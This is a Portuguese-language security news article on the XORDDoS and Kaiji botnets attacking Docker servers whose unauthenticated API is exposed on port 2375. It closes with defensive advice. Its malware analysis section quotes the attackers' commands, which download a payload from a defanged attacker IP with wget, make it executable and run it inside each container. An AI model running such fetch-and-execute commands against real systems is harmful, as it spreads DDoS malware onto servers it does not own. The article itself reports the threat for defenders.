Servidores Docker infectados com malware DDoS XORDDoS e Kaiji

Servidores Docker infectados com malware DDoS XORDDoS e Kaiji. A maioria dos servidores Docker geralmente está infectada com malware de mineração de criptomoedas.

Até recentemente, os servidores Docker mal configurados e deixados expostos online eram historicamente alvos de malware de mineração de criptomoedas, o que ajudou grupos criminosos a gerar enormes lucros sequestrando os recursos de nuvem de outra pessoa.

No entanto, em um relatório publicado pela Trend Micro, os pesquisadores descobriram o que parece ser a primeira série organizada e persistente de ataques contra servidores Docker que infectam clusters mal configurados com malware DDoS. Os invasores geralmente usam botnets para realizar ataques de força bruta após a varredura de portas Secure Shell (SSH) e Telnet. Agora, eles também procuraram por servidores Docker com portas expostas (2375). A porta 2375, uma das duas portas que a API Docker usa, é para comunicação não criptografada e não autenticada .

De acordo com a Trend Micro, os dois botnets estão executando versões das cepas de malware XORDDoS e Kaiji . Ambas as operações de malware têm uma história longa e bem documentada, especialmente XORDDoS, que foi identificado como usado em liberdade por muitos anos. No entanto, os dois botnets DDoS geralmente tinham como alvo roteadores e dispositivos inteligentes, e nunca configurações de nuvem complexas, como clusters Docker.

No entanto, há uma diferença notável entre o método de ataque das duas variantes do malware. Enquanto o ataque XORDDoS se infiltrava no servidor Docker para infectar todos os contêineres hospedados nele, o ataque Kaiji implanta seu próprio contêiner que hospedará seu malware DDoS.

Essas variantes de malware facilitam a negação de serviço distribuída (DDoS), um tipo de ataque projetado para desabilitar, interromper ou desligar uma rede, site ou serviço. Isso é feito usando vários sistemas para sobrecarregar o sistema de destino com tráfego até que se torne inacessível para outros usuários.

“XORDDoS e Kaiji são conhecidos por alavancar telnet e SSH para propagação, então eu vejo o Docker como um novo vetor que aumenta o potencial do botnet, um campo verde cheio de frutas frescas para colher sem concorrentes imediatos“, Pascal Geenens, O evangelista de segurança cibernética da Radware disse à ZDNet por e-mail.

“Os contêineres do Docker normalmente fornecem mais recursos em comparação com os dispositivos IoT, mas normalmente são executados em um ambiente mais seguro e pode ser difícil ou impossível para o contêiner realizar ataques DDoS“, acrescentou Geenens.

“A perspectiva única dos dispositivos IoT, como roteadores e câmeras IP, é que eles têm acesso irrestrito à internet, mas normalmente com menos largura de banda e menos potência em comparação com contêineres em um ambiente comprometido“, disse o pesquisador da Radware à ZDNet . “Os contêineres, por outro lado, normalmente têm acesso a muito mais recursos em termos de memória, CPU e rede, mas os recursos de rede podem ser limitados a apenas um ou alguns protocolos, resultando em um arsenal menor de vetores de ataque DDoS suportados por aqueles ‘super’ bots. “

No entanto, essas limitações geralmente não afetam botnets de mineração de criptografia, que só precisam de um canal HTTPS aberto para o mundo exterior, disse Geenens.

Mas, apesar das limitações em como uma gangue de DDoS pode abusar de clusters do Docker hackeados, Geenens diz que isso não impedirá que os hackers ataquem esse “campo verde cheio de frutas frescas para colher”, pois há muito poucos dispositivos IoT vulneráveis que não foram infectados já, o que forçou os hackers a visar os servidores Docker para começar.

E em uma nota lateral, Geenens também disse à ZDNet que suspeita que os operadores de DDoS já estão bastante familiarizados com os sistemas Docker.

Embora esta seja a primeira vez que eles estão hackeando clusters do Docker, Geenens acredita que os hackers costumam usar o Docker para gerenciar sua própria infraestrutura de ataque.

“Não tenho provas imediatas, mas tenho quase certeza de que, da mesma forma que os aplicativos legítimos se beneficiam da automação e agilidade (DevOps) [do Docker], o mesmo ocorre com os aplicativos ilegais.”

A fonte mais comum de hacks do Docker é a interface de gerenciamento (API) sendo deixada exposta online sem autenticação ou protegida por um firewall. Para leitores que procuram proteger seus servidores, essa seria uma boa primeira coisa a verificar.

Análise de malware XORDDoS

A infecção XORDDoS começou com os invasores procurando por hosts com portas Docker API expostas (2375). Eles então enviaram um comando que listou os contêineres hospedados no servidor Docker. Posteriormente, os invasores executaram a seguinte sequência de comandos para todos os contêineres, infectando todos eles com o malware XORDDoS:

wget hxxp://122[.]51[.]133[.]49:10086/VIP –O VIP

chmod 777 VIP

./VIP

A carga útil XORDDoS (detectada pela Trend Micro como Backdoor.Linux.XORDDOS.AE ) ainda usava a chave XOR usada em outros ataques registrados, BB2FA36AAA9541F0, para criptografar suas strings e se comunicar com o servidor de comando e controle (C&C). Ele também criou várias cópias de si mesmo dentro da máquina como um mecanismo de persistência.

O payload iniciou os tipos de ataques DDoS SYN, ACK e DNS, e foi capaz de baixar e executar um malware de acompanhamento ou de se atualizar.

Ele coletou os seguintes dados, que são relevantes para sua tentativa de iniciar um ataque DDoS:

Informação CPU
MD5 do processo em execução
Informação de Memória
Velocidade da rede
PID do processo em execução

Deve-se observar que a maioria dos comportamentos exibidos por essa variante XORDDoS específica já foi observada em variantes anteriores do malware.

Após uma investigação mais aprofundada do URL vinculado ao invasor, os pesquisadores encontraram outro malware, como Backdoor.Linux.DOFLOO.AB , uma variante do malware botnet Dofloo / AESDDoS Linux que testemunhamos visando APIs Docker expostas anteriormente.

Análise de malware Kaiji

Semelhante ao malware XORDDoS, o Kaiji agora também tem como alvo servidores Docker expostos para propagação. Seu operador também fez uma varredura na Internet em busca de hosts com a porta 2375 exposta. Depois de encontrar um alvo, eles executaram um ping no servidor Docker antes de implantar um contêiner ARM desonesto que executava o binário Kaiji.

O script 123.sh (detectado pela Trend Micro como Trojan.SH.KAIJI.A ) baixou e executou a carga do malware, linux_arm (detectado pela Trend Micro como DDoS.Linux.KAIJI.A ). Posteriormente, o script também removeu outros binários do Linux que são componentes básicos do sistema operacional, mas não são necessários para sua operação DDoS.

A carga útil linux_arm, que é o malware Kaiji DDoS, iniciou os seguintes ataques DDoS:

Ataque ACK
Ataque IPS spoof
Ataque SSH
Ataque SYN
Ataque SYNACK
Ataque de inundação TCP
Ataque de inundação UDP

Este malware também coletou os seguintes dados, que pode usar para os ataques mencionados:

Informação CPU
Diretórios
Nome do domínio
Endereço IP do host
PID do processo em execução
Esquema de URL

Defender servidores Docker

Como visto nessas descobertas, os agentes de ameaças por trás de variantes de malware atualizam constantemente suas criações com novos recursos para que possam implantar seus ataques contra outros pontos de entrada. Como são relativamente convenientes para implantar na nuvem, os servidores Docker estão se tornando uma opção cada vez mais popular para as empresas. No entanto, eles também os tornam um alvo atraente para os cibercriminosos que estão sempre em busca de sistemas que possam explorar.

Em seu relatório, a Trend Micro também recomenda que os administradores de servidor protejam suas implantações do Docker seguindo uma série de etapas básicas:

Proteja o host do contêiner. Aproveite as ferramentas de monitoramento e hospede contêineres em um sistema operacional focado em contêiner.
Proteja o ambiente de rede. Use o sistema de prevenção de intrusão (IPS) e filtragem da web para fornecer visibilidade e observar o tráfego interno e externo.
Proteja a pilha de gerenciamento. Monitore e proteja o registro do contêiner e bloqueie a instalação do Kubernetes.
Proteja o pipeline de construção. Implemente um esquema de controle de acesso completo e consistente e instale controles de endpoint fortes.
Siga as melhores práticas recomendadas .
Use ferramentas de segurança para verificar e proteger os contêineres.

Fonte: ZDNet & Trend Micro

Veja também: